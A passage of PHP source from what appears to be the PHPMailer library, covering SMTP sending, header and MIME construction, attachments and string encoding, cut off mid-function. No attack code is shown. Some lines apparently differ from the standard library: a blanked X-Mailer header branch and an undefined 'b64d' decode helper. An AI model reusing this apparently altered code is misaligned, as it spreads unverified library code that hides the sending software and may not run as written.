$smtp_from = $this->From; } else { $smtp_from = $this->Sender; } if (!$this->smtp->mail($smtp_from)) { $this->setError($this->lang('from_failed') . $smtp_from . ' : ' . implode(',', $this->smtp->getError())); throw new phpmailerException($this->ErrorInfo, self::STOP_CRITICAL); } foreach (array($this->to, $this->cc, $this->bcc) as $togroup) { foreach ($togroup as $to) { if (!$this->smtp->recipient($to[0])) { $error = $this->smtp->getError(); $bad_rcpt[] = array('to' => $to[0], 'error' => $error['detail']); $isSent = false; } else { $isSent = true; } $this->doCallback($isSent, array($to[0]), array(), array(), $this->Subject, $body, $this->From); } } if ((count($this->all_recipients) > count($bad_rcpt)) and !$this->smtp->data($header . $body)) { throw new phpmailerException($this->lang('data_not_accepted'), self::STOP_CRITICAL); } if ($this->SMTPKeepAlive) { $this->smtp->reset(); } else { $this->smtp->quit(); $this->smtp->close(); } if (count($bad_rcpt) > 0) { $errstr = ''; foreach ($bad_rcpt as $bad) { $errstr .= $bad['to'] . ': ' . $bad['error']; } throw new phpmailerException( $this->lang('recipients_failed') . $errstr, self::STOP_CONTINUE ); } return true; } public function smtpConnect($options = array()) { if (is_null($this->smtp)) { $this->smtp = $this->getSMTPInstance(); } if ($this->smtp->connected()) { return true; } $this->smtp->setTimeout($this->Timeout); $this->smtp->setDebugLevel($this->SMTPDebug); $this->smtp->setDebugOutput($this->Debugoutput); $this->smtp->setVerp($this->do_verp); $hosts = explode(';', $this->Host); $lastexception = null; foreach ($hosts as $hostentry) { $hostinfo = array(); if (!preg_match('/^((ssl|tls):\/\/)*([a-zA-Z0-9\.-]*):?([0-9]*)$/', trim($hostentry), $hostinfo)) { continue; } $prefix = ''; $secure = $this->SMTPSecure; $tls = ($this->SMTPSecure == 'tls'); if ('ssl' == $hostinfo[2] or ('' == $hostinfo[2] and 'ssl' == $this->SMTPSecure)) { $prefix = 'ssl://'; $tls = false; // Can't have SSL and TLS at the same time $secure = 'ssl'; } elseif ($hostinfo[2] == 'tls') { $tls = true; $secure = 'tls'; } $sslext = defined('OPENSSL_ALGO_SHA1'); if ('tls' === $secure or 'ssl' === $secure) { if (!$sslext) { throw new phpmailerException($this->lang('extension_missing').'openssl', self::STOP_CRITICAL); } } $host = $hostinfo[3]; $port = $this->Port; $tport = (integer)$hostinfo[4]; if ($tport > 0 and $tport < 65536) { $port = $tport; } if ($this->smtp->connect($prefix . $host, $port, $this->Timeout, $options)) { try { if ($this->Helo) { $hello = $this->Helo; } else { $hello = $this->serverHostname(); } $this->smtp->hello($hello); if ($this->SMTPAutoTLS and $sslext and $secure != 'ssl' and $this->smtp->getServerExt('STARTTLS')) { $tls = true; } if ($tls) { if (!$this->smtp->startTLS()) { throw new phpmailerException($this->lang('connect_host')); } $this->smtp->hello($hello); } if ($this->SMTPAuth) { if (!$this->smtp->authenticate( $this->Username, $this->Password, $this->AuthType, $this->Realm, $this->Workstation ) ) { throw new phpmailerException($this->lang('authenticate')); } } return true; } catch (phpmailerException $exc) { $lastexception = $exc; $this->edebug($exc->getMessage()); $this->smtp->quit(); } } } $this->smtp->close(); if ($this->exceptions and !is_null($lastexception)) { throw $lastexception; } return false; } public function smtpClose() { if ($this->smtp !== null) { if ($this->smtp->connected()) { $this->smtp->quit(); $this->smtp->close(); } } } public function setLanguage($langcode = 'en', $lang_path = '') { // Define full set of translatable strings in English $PHPMAILER_LANG = array( 'authenticate' => 'SMTP Error: Could not authenticate.', 'connect_host' => 'SMTP Error: Could not connect to SMTP host.', 'data_not_accepted' => 'SMTP Error: data not accepted.', 'empty_message' => 'Message body empty', 'encoding' => 'Unknown encoding: ', 'execute' => 'Could not execute: ', 'file_access' => 'Could not access file: ', 'file_open' => 'File Error: Could not open file: ', 'from_failed' => 'The following From address failed: ', 'instantiate' => 'Could not instantiate mail function.', 'invalid_address' => 'Invalid address', 'mailer_not_supported' => ' mailer is not supported.', 'provide_address' => 'You must provide at least one recipient email address.', 'recipients_failed' => 'SMTP Error: The following recipients failed: ', 'signing' => 'Signing Error: ', 'smtp_connect_failed' => 'SMTP connect() failed.', 'smtp_error' => 'SMTP server error: ', 'variable_set' => 'Cannot set or reset variable: ' ); if (empty($lang_path)) { // Calculate an absolute path so it can work if CWD is not here $lang_path = dirname(__FILE__). DIRECTORY_SEPARATOR . 'language'. DIRECTORY_SEPARATOR; } $foundlang = true; $lang_file = $lang_path . 'phpmailer.lang-' . $langcode . '.php'; if ($langcode != 'en') { // There is no English translation file // Make sure language file path is readable if (!is_readable($lang_file)) { $foundlang = false; } else { $foundlang = include $lang_file; } } $this->language = $PHPMAILER_LANG; return (boolean)$foundlang; // Returns false if language not found } public function getTranslations() { return $this->language; } public function addrAppend($type, $addr) { $addresses = array(); foreach ($addr as $address) { $addresses[] = $this->addrFormat($address); } return $type . ': ' . implode(', ', $addresses) . $this->LE; } public function addrFormat($addr) { if (empty($addr[1])) { // No name provided return $this->secureHeader($addr[0]); } else { return $this->encodeHeader($this->secureHeader($addr[1]), 'phrase') . ' <' . $this->secureHeader( $addr[0] ) . '>'; } } public function wrapText($message, $length, $qp_mode = false) { $soft_break = ($qp_mode) ? sprintf(' =%s', $this->LE) : $this->LE; $is_utf8 = (strtolower($this->CharSet) == 'utf-8'); $lelen = strlen($this->LE); $crlflen = strlen(self::CRLF); $message = $this->fixEOL($message); if (substr($message, -$lelen) == $this->LE) { $message = substr($message, 0, -$lelen); } $line = explode($this->LE, $message); // Magic. We know fixEOL uses $LE $message = ''; for ($i = 0; $i < count($line); $i++) { $line_part = explode(' ', $line[$i]); $buf = ''; for ($e = 0; $e < count($line_part); $e++) { $word = $line_part[$e]; if ($qp_mode and (strlen($word) > $length)) { $space_left = $length - strlen($buf) - $crlflen; if ($e != 0) { if ($space_left > 20) { $len = $space_left; if ($is_utf8) { $len = $this->utf8CharBoundary($word, $len); } elseif (substr($word, $len - 1, 1) == '=') { $len--; } elseif (substr($word, $len - 2, 1) == '=') { $len -= 2; } $part = substr($word, 0, $len); $word = substr($word, $len); $buf .= ' ' . $part; $message .= $buf . sprintf('=%s', self::CRLF); } else { $message .= $buf . $soft_break; } $buf = ''; } while (strlen($word) > 0) { if ($length <= 0) { break; } $len = $length; if ($is_utf8) { $len = $this->utf8CharBoundary($word, $len); } elseif (substr($word, $len - 1, 1) == '=') { $len--; } elseif (substr($word, $len - 2, 1) == '=') { $len -= 2; } $part = substr($word, 0, $len); $word = substr($word, $len); if (strlen($word) > 0) { $message .= $part . sprintf('=%s', self::CRLF); } else { $buf = $part; } } } else { $buf_o = $buf; $buf .= ($e == 0) ? $word : (' ' . $word); if (strlen($buf) > $length and $buf_o != '') { $message .= $buf_o . $soft_break; $buf = $word; } } } $message .= $buf . self::CRLF; } return $message; } public function utf8CharBoundary($encodedText, $maxLength) { $foundSplitPos = false; $lookBack = 3; while (!$foundSplitPos) { $lastChunk = substr($encodedText, $maxLength - $lookBack, $lookBack); $encodedCharPos = strpos($lastChunk, '='); if (false !== $encodedCharPos) { // Found start of encoded character byte within $lookBack block. // Check the encoded byte value (the 2 chars after the '=') $hex = substr($encodedText, $maxLength - $lookBack + $encodedCharPos + 1, 2); $dec = hexdec($hex); if ($dec < 128) { // Single byte character. // If the encoded char was found at pos 0, it will fit // otherwise reduce maxLength to start of the encoded char $maxLength = ($encodedCharPos == 0) ? $maxLength : $maxLength - ($lookBack - $encodedCharPos); $foundSplitPos = true; } elseif ($dec >= 192) { // First byte of a multi byte character // Reduce maxLength to split at start of character $maxLength = $maxLength - ($lookBack - $encodedCharPos); $foundSplitPos = true; } elseif ($dec < 192) { // Middle byte of a multi byte character, look further back $lookBack += 3; } } else { // No encoded character found $foundSplitPos = true; } } return $maxLength; } public function setWordWrap() { if ($this->WordWrap < 1) { return; } switch ($this->message_type) { case 'alt': case 'alt_inline': case 'alt_attach': case 'alt_inline_attach': $this->AltBody = $this->wrapText($this->AltBody, $this->WordWrap); break; default: $this->Body = $this->wrapText($this->Body, $this->WordWrap); break; } } public function createHeader() { $result = ''; // Set the boundaries $uniq_id = md5(uniqid(time())); $this->boundary[1] = 'b1_' . $uniq_id; $this->boundary[2] = 'b2_' . $uniq_id; $this->boundary[3] = 'b3_' . $uniq_id; if ($this->MessageDate == '') { $this->MessageDate = self::rfcDate(); } $result .= $this->headerLine('Date', $this->MessageDate); // To be created automatically by mail() if ($this->SingleTo) { if ($this->Mailer != 'mail') { foreach ($this->to as $toaddr) { $this->SingleToArray[] = $this->addrFormat($toaddr); } } } else { if (count($this->to) > 0) { if ($this->Mailer != 'mail') { $result .= $this->addrAppend('To', $this->to); } } elseif (count($this->cc) == 0) { $result .= $this->headerLine('To', 'undisclosed-recipients:;'); } } $result .= $this->addrAppend('From', array(array(trim($this->From), $this->FromName))); // sendmail and mail() extract Cc from the header before sending if (count($this->cc) > 0) { $result .= $this->addrAppend('Cc', $this->cc); } // sendmail and mail() extract Bcc from the header before sending if (( $this->Mailer == 'sendmail' or $this->Mailer == 'qmail' or $this->Mailer == 'mail' ) and count($this->bcc) > 0 ) { $result .= $this->addrAppend('Bcc', $this->bcc); } if (count($this->ReplyTo) > 0) { $result .= $this->addrAppend('Reply-To', $this->ReplyTo); } // mail() sets the subject itself if ($this->Mailer != 'mail') { $result .= $this->headerLine('Subject', $this->encodeHeader($this->secureHeader($this->Subject))); } if ($this->MessageID != '') { $this->lastMessageID = $this->MessageID; } else { $this->lastMessageID = sprintf('<%s@%s>', $uniq_id, $this->ServerHostname()); } $result .= $this->HeaderLine('Message-ID', $this->lastMessageID); $result .= $this->headerLine('X-Priority', $this->Priority); if ($this->XMailer == '') { } else { $myXmailer = trim($this->XMailer); if ($myXmailer) { $result .= $this->headerLine('X-Mailer', $myXmailer); } } if ($this->ConfirmReadingTo != '') { $result .= $this->headerLine('Disposition-Notification-To', '<' . trim($this->ConfirmReadingTo) . '>'); } // Add custom headers for ($index = 0; $index < count($this->CustomHeader); $index++) { $result .= $this->headerLine( trim($this->CustomHeader[$index][0]), $this->encodeHeader(trim($this->CustomHeader[$index][1])) ); } if (!$this->sign_key_file) { $result .= $this->headerLine('MIME-Version', '1.0'); $result .= $this->getMailMIME(); } return $result; } public function getMailMIME() { $result = ''; $ismultipart = true; switch ($this->message_type) { case 'inline': $result .= $this->headerLine('Content-Type', 'multipart/related;'); $result .= $this->textLine("\tboundary=\"" . $this->boundary[1] . '"'); break; case 'attach': case 'inline_attach': case 'alt_attach': case 'alt_inline_attach': $result .= $this->headerLine('Content-Type', 'multipart/mixed;'); $result .= $this->textLine("\tboundary=\"" . $this->boundary[1] . '"'); break; case 'alt': case 'alt_inline': $result .= $this->headerLine('Content-Type', 'multipart/alternative;'); $result .= $this->textLine("\tboundary=\"" . $this->boundary[1] . '"'); break; default: // Catches case 'plain': and case '': $result .= $this->textLine('Content-Type: ' . $this->ContentType . '; charset=' . $this->CharSet); $ismultipart = false; break; } // RFC1341 part 5 says 7bit is assumed if not specified if ($this->Encoding != '7bit') { // RFC 2045 section 6.4 says multipart MIME parts may only use 7bit, 8bit or binary CTE if ($ismultipart) { if ($this->Encoding == '8bit') { $result .= $this->headerLine('Content-Transfer-Encoding', '8bit'); } // The only remaining alternatives are quoted-printable and base64, which are both 7bit compatible } else { $result .= $this->headerLine('Content-Transfer-Encoding', $this->Encoding); } } if ($this->Mailer != 'mail') { $result .= $this->LE; } return $result; } public function getSentMIMEMessage() { return $this->MIMEHeader . $this->mailHeader . self::CRLF . $this->MIMEBody; } public function createBody() { $body = ''; if ($this->sign_key_file) { $body .= $this->getMailMIME() . $this->LE; } $this->setWordWrap(); $bodyEncoding = $this->Encoding; $bodyCharSet = $this->CharSet; if ($bodyEncoding == '8bit' and !$this->has8bitChars($this->Body)) { $bodyEncoding = '7bit'; $bodyCharSet = 'us-ascii'; } $altBodyEncoding = $this->Encoding; $altBodyCharSet = $this->CharSet; if ($altBodyEncoding == '8bit' and !$this->has8bitChars($this->AltBody)) { $altBodyEncoding = '7bit'; $altBodyCharSet = 'us-ascii'; } switch ($this->message_type) { case 'inline': $body .= $this->getBoundary($this->boundary[1], $bodyCharSet, '', $bodyEncoding); $body .= $this->encodeString($this->Body, $bodyEncoding); $body .= $this->LE . $this->LE; $body .= $this->attachAll('inline', $this->boundary[1]); break; case 'attach': $body .= $this->getBoundary($this->boundary[1], $bodyCharSet, '', $bodyEncoding); $body .= $this->encodeString($this->Body, $bodyEncoding); $body .= $this->LE . $this->LE; $body .= $this->attachAll('attachment', $this->boundary[1]); break; case 'inline_attach': $body .= $this->textLine('--' . $this->boundary[1]); $body .= $this->headerLine('Content-Type', 'multipart/related;'); $body .= $this->textLine("\tboundary=\"" . $this->boundary[2] . '"'); $body .= $this->LE; $body .= $this->getBoundary($this->boundary[2], $bodyCharSet, '', $bodyEncoding); $body .= $this->encodeString($this->Body, $bodyEncoding); $body .= $this->LE . $this->LE; $body .= $this->attachAll('inline', $this->boundary[2]); $body .= $this->LE; $body .= $this->attachAll('attachment', $this->boundary[1]); break; case 'alt': $body .= $this->getBoundary($this->boundary[1], $altBodyCharSet, 'text/plain', $altBodyEncoding); $body .= $this->encodeString($this->AltBody, $altBodyEncoding); $body .= $this->LE . $this->LE; $body .= $this->getBoundary($this->boundary[1], $bodyCharSet, 'text/html', $bodyEncoding); $body .= $this->encodeString($this->Body, $bodyEncoding); $body .= $this->LE . $this->LE; if (!empty($this->Ical)) { $body .= $this->getBoundary($this->boundary[1], '', 'text/calendar; method=REQUEST', ''); $body .= $this->encodeString($this->Ical, $this->Encoding); $body .= $this->LE . $this->LE; } $body .= $this->endBoundary($this->boundary[1]); break; case 'alt_inline': $body .= $this->getBoundary($this->boundary[1], $altBodyCharSet, 'text/plain', $altBodyEncoding); $body .= $this->encodeString($this->AltBody, $altBodyEncoding); $body .= $this->LE . $this->LE; $body .= $this->textLine('--' . $this->boundary[1]); $body .= $this->headerLine('Content-Type', 'multipart/related;'); $body .= $this->textLine("\tboundary=\"" . $this->boundary[2] . '"'); $body .= $this->LE; $body .= $this->getBoundary($this->boundary[2], $bodyCharSet, 'text/html', $bodyEncoding); $body .= $this->encodeString($this->Body, $bodyEncoding); $body .= $this->LE . $this->LE; $body .= $this->attachAll('inline', $this->boundary[2]); $body .= $this->LE; $body .= $this->endBoundary($this->boundary[1]); break; case 'alt_attach': $body .= $this->textLine('--' . $this->boundary[1]); $body .= $this->headerLine('Content-Type', 'multipart/alternative;'); $body .= $this->textLine("\tboundary=\"" . $this->boundary[2] . '"'); $body .= $this->LE; $body .= $this->getBoundary($this->boundary[2], $altBodyCharSet, 'text/plain', $altBodyEncoding); $body .= $this->encodeString($this->AltBody, $altBodyEncoding); $body .= $this->LE . $this->LE; $body .= $this->getBoundary($this->boundary[2], $bodyCharSet, 'text/html', $bodyEncoding); $body .= $this->encodeString($this->Body, $bodyEncoding); $body .= $this->LE . $this->LE; $body .= $this->endBoundary($this->boundary[2]); $body .= $this->LE; $body .= $this->attachAll('attachment', $this->boundary[1]); break; case 'alt_inline_attach': $body .= $this->textLine('--' . $this->boundary[1]); $body .= $this->headerLine('Content-Type', 'multipart/alternative;'); $body .= $this->textLine("\tboundary=\"" . $this->boundary[2] . '"'); $body .= $this->LE; $body .= $this->getBoundary($this->boundary[2], $altBodyCharSet, 'text/plain', $altBodyEncoding); $body .= $this->encodeString($this->AltBody, $altBodyEncoding); $body .= $this->LE . $this->LE; $body .= $this->textLine('--' . $this->boundary[2]); $body .= $this->headerLine('Content-Type', 'multipart/related;'); $body .= $this->textLine("\tboundary=\"" . $this->boundary[3] . '"'); $body .= $this->LE; $body .= $this->getBoundary($this->boundary[3], $bodyCharSet, 'text/html', $bodyEncoding); $body .= $this->encodeString($this->Body, $bodyEncoding); $body .= $this->LE . $this->LE; $body .= $this->attachAll('inline', $this->boundary[3]); $body .= $this->LE; $body .= $this->endBoundary($this->boundary[2]); $body .= $this->LE; $body .= $this->attachAll('attachment', $this->boundary[1]); break; default: // catch case 'plain' and case '' $body .= $this->encodeString($this->Body, $bodyEncoding); break; } if ($this->isError()) { $body = ''; } elseif ($this->sign_key_file) { try { if (!defined('PKCS7_TEXT')) { throw new phpmailerException($this->lang('signing') . ' OpenSSL extension missing.'); } // @TODO would be nice to use php://temp streams here, but need to wrap for PHP < 5.1 $file = tempnam(sys_get_temp_dir(), 'mail'); if (false === file_put_contents($file, $body)) { throw new phpmailerException($this->lang('signing') . ' Could not write temp file'); } $signed = tempnam(sys_get_temp_dir(), 'signed'); if (@openssl_pkcs7_sign( $file, $signed, 'file://' . realpath($this->sign_cert_file), array('file://' . realpath($this->sign_key_file), $this->sign_key_pass), null ) ) { @unlink($file); $body = file_get_contents($signed); @unlink($signed); } else { @unlink($file); @unlink($signed); throw new phpmailerException($this->lang('signing') . openssl_error_string()); } } catch (phpmailerException $exc) { $body = ''; if ($this->exceptions) { throw $exc; } } } return $body; } protected function getBoundary($boundary, $charSet, $contentType, $encoding) { $result = ''; if ($charSet == '') { $charSet = $this->CharSet; } if ($contentType == '') { $contentType = $this->ContentType; } if ($encoding == '') { $encoding = $this->Encoding; } $result .= $this->textLine('--' . $boundary); $result .= sprintf('Content-Type: %s; charset=%s', $contentType, $charSet); $result .= $this->LE; // RFC1341 part 5 says 7bit is assumed if not specified if ($encoding != '7bit') { $result .= $this->headerLine('Content-Transfer-Encoding', $encoding); } $result .= $this->LE; return $result; } protected function endBoundary($boundary) { return $this->LE . '--' . $boundary . '--' . $this->LE; } protected function setMessageType() { $type = array(); if ($this->alternativeExists()) { $type[] = 'alt'; } if ($this->inlineImageExists()) { $type[] = 'inline'; } if ($this->attachmentExists()) { $type[] = 'attach'; } $this->message_type = implode('_', $type); if ($this->message_type == '') { $this->message_type = 'plain'; } } public function headerLine($name, $value) { return $name . ': ' . $value . $this->LE; } public function textLine($value) { return $value . $this->LE; } public function addAttachment($path, $name = '', $encoding = 'base64', $type = '', $disposition = 'attachment') { try { if (!@is_file($path)) { throw new phpmailerException($this->lang('file_access') . $path, self::STOP_CONTINUE); } // If a MIME type is not specified, try to work it out from the file name if ($type == '') { $type = self::filenameToType($path); } $filename = basename($path); if ($name == '') { $name = $filename; } $this->attachment[] = array( 0 => $path, 1 => $filename, 2 => $name, 3 => $encoding, 4 => $type, 5 => false, // isStringAttachment 6 => $disposition, 7 => 0 ); } catch (phpmailerException $exc) { $this->setError($exc->getMessage()); $this->edebug($exc->getMessage()); if ($this->exceptions) { throw $exc; } return false; } return true; } public function getAttachments() { return $this->attachment; } protected function attachAll($disposition_type, $boundary) { // Return text of body $mime = array(); $cidUniq = array(); $incl = array(); // Add all attachments foreach ($this->attachment as $attachment) { // Check if it is a valid disposition_filter if ($attachment[6] == $disposition_type) { // Check for string attachment $string = ''; $path = ''; $bString = $attachment[5]; if ($bString) { $string = $attachment[0]; } else { $path = $attachment[0]; } $inclhash = md5(serialize($attachment)); if (in_array($inclhash, $incl)) { continue; } $incl[] = $inclhash; $name = $attachment[2]; $encoding = $attachment[3]; $type = $attachment[4]; $disposition = $attachment[6]; $cid = $attachment[7]; if ($disposition == 'inline' && isset($cidUniq[$cid])) { continue; } $cidUniq[$cid] = true; $mime[] = sprintf('--%s%s', $boundary, $this->LE); $mime[] = sprintf( 'Content-Type: %s; name="%s"%s', $type, $this->encodeHeader($this->secureHeader($name)), $this->LE ); // RFC1341 part 5 says 7bit is assumed if not specified if ($encoding != '7bit') { $mime[] = sprintf('Content-Transfer-Encoding: %s%s', $encoding, $this->LE); } if ($disposition == 'inline') { $mime[] = sprintf('Content-ID: <%s>%s', $cid, $this->LE); } // If a filename contains any of these chars, it should be quoted, // but not otherwise: RFC2183 & RFC2045 5.1 // Fixes a warning in IETF's msglint MIME checker // Allow for bypassing the Content-Disposition header totally if (!(empty($disposition))) { $encoded_name = $this->encodeHeader($this->secureHeader($name)); if (preg_match('/[ \(\)<>@,;:\\"\/\[\]\?=]/', $encoded_name)) { $mime[] = sprintf( 'Content-Disposition: %s; filename="%s"%s', $disposition, $encoded_name, $this->LE . $this->LE ); } else { $mime[] = sprintf( 'Content-Disposition: %s; filename=%s%s', $disposition, $encoded_name, $this->LE . $this->LE ); } } else { $mime[] = $this->LE; } // Encode as string attachment if ($bString) { $mime[] = $this->encodeString($string, $encoding); if ($this->isError()) { return ''; } $mime[] = $this->LE . $this->LE; } else { $mime[] = $this->encodeFile($path, $encoding); if ($this->isError()) { return ''; } $mime[] = $this->LE . $this->LE; } } } $mime[] = sprintf('--%s--%s', $boundary, $this->LE); return implode('', $mime); } protected function encodeFile($path, $encoding = 'base64') { try { if (!is_readable($path)) { throw new phpmailerException($this->lang('file_open') . $path, self::STOP_CONTINUE); } $magic_quotes = get_magic_quotes_runtime(); if ($magic_quotes) { if (version_compare(PHP_VERSION, '5.3.0', '<')) { set_magic_quotes_runtime(false); } else { ini_set('magic_quotes_runtime', 0); } } $file_buffer = file_get_contents($path); $file_buffer = $this->encodeString($file_buffer, $encoding); if ($magic_quotes) { if (version_compare(PHP_VERSION, '5.3.0', '<')) { set_magic_quotes_runtime($magic_quotes); } else { ini_set('magic_quotes_runtime', ($magic_quotes?'1':'0')); } } return $file_buffer; } catch (Exception $exc) { $this->setError($exc->getMessage()); return ''; } } public function encodeString($str, $encoding = 'base64') { $encoded = ''; switch (strtolower($encoding)) { case 'base64': $encoded = chunk_split(base64_encode($str), 76, $this->LE); break; case '7bit': case '8bit': $encoded = $this->fixEOL($str); // Make sure it ends with a line break if (substr($encoded, -(strlen($this->LE))) != $this->LE) { $encoded .= $this->LE; } break; case 'binary': $encoded = $str; break; case 'quoted-printable': $encoded = $this->encodeQP($str); break; default: $this->setError($this->lang('encoding') . $encoding); break; } return $encoded; } public function encodeHeader($str, $position = 'text') { $matchcount = 0; switch (strtolower($position)) { case 'phrase': if (!preg_match('/[\200-\377]/', $str)) { // Can't use addslashes as we don't know the value of magic_quotes_sybase $encoded = addcslashes($str, "\0..\37\177\\\""); if (($str == $encoded) && !preg_match('/[^A-Za-z0-9!#$%&\'*+\/=?^_`{|}~ -]/', $str)) { return ($encoded); } else { return ("\"$encoded\""); } } $matchcount = preg_match_all('/[^\040\041\043-\133\135-\176]/', $str, $matches); break; /** @noinspection PhpMissingBreakStatementInspection */ case 'comment': $matchcount = preg_match_all('/[()"]/', $str, $matches); // Intentional fall-through case 'text': default: $matchcount += preg_match_all('/[\000-\010\013\014\016-\037\177-\377]/', $str, $matches); break; } if ($matchcount == 0) { // There are no chars that need encoding return ($str); } $maxlen = 75 - 7 - strlen($this->CharSet); // Try to select the encoding which should produce the shortest output if ($matchcount > strlen($str) / 3) { // More than a third of the content will need encoding, so B encoding will be most efficient $encoding = 'B'; if (function_exists('mb_strlen') && $this->hasMultiBytes($str)) { $encoded = $this->base64EncodeWrapMB($str, "\n"); } else { $encoded = base64_encode($str); $maxlen -= $maxlen % 4; $encoded = trim(chunk_split($encoded, $maxlen, "\n")); } } else { $encoding = 'Q'; $encoded = $this->encodeQ($str, $position); $encoded = $this->wrapText($encoded, $maxlen, true); $encoded = str_replace('=' . self::CRLF, "\n", trim($encoded)); } $encoded = preg_replace('/^(.*)$/m', ' =?' . $this->CharSet . "?$encoding?\\1?=", $encoded); $encoded = trim(str_replace("\n", $this->LE, $encoded)); return $encoded; } public function hasMultiBytes($str) { if (function_exists('mb_strlen')) { return (strlen($str) > mb_strlen($str, $this->CharSet)); } else { // Assume no multibytes (we can't handle without mbstring functions anyway) return false; } } public function has8bitChars($text) { return (boolean)preg_match('/[\x80-\xFF]/', $text); } public function base64EncodeWrapMB($str, $linebreak = null) { $start = '=?' . $this->CharSet . '?B?'; $end = '?='; $encoded = ''; if ($linebreak === null) { $linebreak = $this->LE; } $mb_length = mb_strlen($str, $this->CharSet); // Each line must have length <= 75, including $start and $end $length = 75 - strlen($start) - strlen($end); // Average multi-byte ratio $ratio = $mb_length / strlen($str); // Base64 has a 4:3 ratio $avgLength = floor($length * $ratio * .75); for ($i = 0; $i < $mb_length; $i += $offset) { $lookBack = 0; do { $offset = $avgLength - $lookBack; $chunk = mb_substr($str, $i, $offset, $this->CharSet); $chunk = base64_encode($chunk); $lookBack++; } while (strlen($chunk) > $length); $encoded .= $chunk . $linebreak; } // Chomp the last linefeed $encoded = substr($encoded, 0, -strlen($linebreak)); return $encoded; } public function encodeQP($string, $line_max = 76) { if (function_exists('quoted_printable_encode')) { // Use native function if it's available (>= PHP5.3) return $this->fixEOL(quoted_printable_encode($string)); } // Fall back to a pure PHP implementation $string = str_replace( array('%20', '%0D%0A.', '%0D%0A', '%'), array(' ', "\r\n=2E", "\r\n", '='), rawurlencode($string) ); $string = preg_replace('/[^\r\n]{' . ($line_max - 3) . '}[^=\r\n]{2}/', "$0=\r\n", $string); return $this->fixEOL($string); } public function encodeQPphp( $string, $line_max = 76, /** @noinspection PhpUnusedParameterInspection */ $space_conv = false ) { return $this->encodeQP($string, $line_max); } public function encodeQ($str, $position = 'text') { // There should not be any EOL in the string $pattern = ''; $encoded = str_replace(array("\r", "\n"), '', $str); switch (strtolower($position)) { case 'phrase': // RFC 2047 section 5.3 $pattern = '^A-Za-z0-9!*+\/ -'; break; /** @noinspection PhpMissingBreakStatementInspection */ case 'comment': // RFC 2047 section 5.2 $pattern = '\(\)"'; case 'text': default: $pattern = '\000-\011\013\014\016-\037\075\077\137\177-\377' . $pattern; break; } $matches = array(); if (preg_match_all("/[{$pattern}]/", $encoded, $matches)) { $eqkey = array_search('=', $matches[0]); if (false !== $eqkey) { unset($matches[0][$eqkey]); array_unshift($matches[0], '='); } foreach (array_unique($matches[0]) as $char) { $encoded = str_replace($char, '=' . sprintf('%02X', ord($char)), $encoded); } } // Replace every spaces to _ (more readable than =20) return str_replace(' ', '_', $encoded); } public function addStringAttachment( $string, $filename, $encoding = 'base64', $type = '', $disposition = 'attachment' ) { // If a MIME type is not specified, try to work it out from the file name if ($type == '') { $type = self::filenameToType($filename); } // Append to $attachment array $this->attachment[] = array( 0 => $string, 1 => $filename, 2 => basename($filename), 3 => $encoding, 4 => $type, 5 => true, // isStringAttachment 6 => $disposition, 7 => 0 ); } public function addEmbeddedImage($path, $cid, $name = '', $encoding = 'base64', $type = '', $disposition = 'inline') { if (!@is_file($path)) { $this->setError($this->lang('file_access') . $path); return false; } // If a MIME type is not specified, try to work it out from the file name if ($type == '') { $type = self::filenameToType($path); } $filename = basename($path); if ($name == '') { $name = $filename; } // Append to $attachment array $this->attachment[] = array( 0 => $path, 1 => $filename, 2 => $name, 3 => $encoding, 4 => $type, 5 => false, // isStringAttachment 6 => $disposition, 7 => $cid ); return true; } public function addStringEmbeddedImage( $string, $cid, $name = '', $encoding = 'base64', $type = '', $disposition = 'inline' ) { // If a MIME type is not specified, try to work it out from the name if ($type == '') { $type = self::filenameToType($name); } // Append to $attachment array $this->attachment[] = array( 0 => $string, 1 => $name, 2 => $name, 3 => $encoding, 4 => $type, 5 => true, // isStringAttachment 6 => $disposition, 7 => $cid ); return true; } public function inlineImageExists() { foreach ($this->attachment as $attachment) { if ($attachment[6] == 'inline') { return true; } } return false; } public function attachmentExists() { foreach ($this->attachment as $attachment) { if ($attachment[6] == 'attachment') { return true; } } return false; } public function alternativeExists() { return !empty($this->AltBody); } public function clearAddresses() { foreach ($this->to as $to) { unset($this->all_recipients[strtolower($to[0])]); } $this->to = array(); } public function clearCCs() { foreach ($this->cc as $cc) { unset($this->all_recipients[strtolower($cc[0])]); } $this->cc = array(); } public function clearBCCs() { foreach ($this->bcc as $bcc) { unset($this->all_recipients[strtolower($bcc[0])]); } $this->bcc = array(); } public function clearReplyTos() { $this->ReplyTo = array(); } public function clearAllRecipients() { $this->to = array(); $this->cc = array(); $this->bcc = array(); $this->all_recipients = array(); } public function clearAttachments() { $this->attachment = array(); } public function clearCustomHeaders() { $this->CustomHeader = array(); } protected function setError($msg) { $this->error_count++; if ($this->Mailer == 'smtp' and !is_null($this->smtp)) { $lasterror = $this->smtp->getError(); if (!empty($lasterror) and array_key_exists('smtp_msg', $lasterror)) { $msg .= '
' . $this->lang('smtp_error') . $lasterror['smtp_msg'] . "

\n"; } } $this->ErrorInfo = $msg; } public static function rfcDate() { // Set the time zone to whatever the default is to avoid 500 errors // Will default to UTC if it's not set properly in php.ini date_default_timezone_set(@date_default_timezone_get()); return date('D, j M Y H:i:s O'); } protected function serverHostname() { $result = 'localhost.localdomain'; if (!empty($this->Hostname)) { $result = $this->Hostname; } elseif (isset($_SERVER) and array_key_exists('SERVER_NAME', $_SERVER) and !empty($_SERVER['SERVER_NAME'])) { $result = $_SERVER['SERVER_NAME']; } elseif (function_exists('gethostname') && gethostname() !== false) { $result = gethostname(); } elseif (php_uname('n') !== false) { $result = php_uname('n'); } return $result; } protected function lang($key) { if (count($this->language) < 1) { $this->setLanguage('en'); // set the default language } if (isset($this->language[$key])) { return $this->language[$key]; } else { return 'Language string failed to load: ' . $key; } } public function isError() { return ($this->error_count > 0); } public function fixEOL($str) { // Normalise to \n $nstr = str_replace(array("\r\n", "\r"), "\n", $str); // Now convert LE as needed if ($this->LE !== "\n") { $nstr = str_replace("\n", $this->LE, $nstr); } return $nstr; } public function addCustomHeader($name, $value = null) { if ($value === null) { // Value passed in as name:value $this->CustomHeader[] = explode(':', $name, 2); } else { $this->CustomHeader[] = array($name, $value); } } public function msgHTML($message, $basedir = '', $advanced = false) { preg_match_all('/(src|background)=["\'](.*)["\']/Ui', $message, $images); if (isset($images[2])) { foreach ($images[2] as $imgindex => $url) { // Convert data URIs into embedded images if (preg_match('#^data:(image[^;,]*)(;base64)?,#', $url, $match)) { $data = substr($url, strpos($url, ',')+1); if ($match[2]) { $data = b64d($data); } else { $data = rawurldecode($data); } $cid = md5($url) . '@phpmailer.0'; // RFC2392 S 2 if ($this->addStringEmbeddedImage($data, $cid, 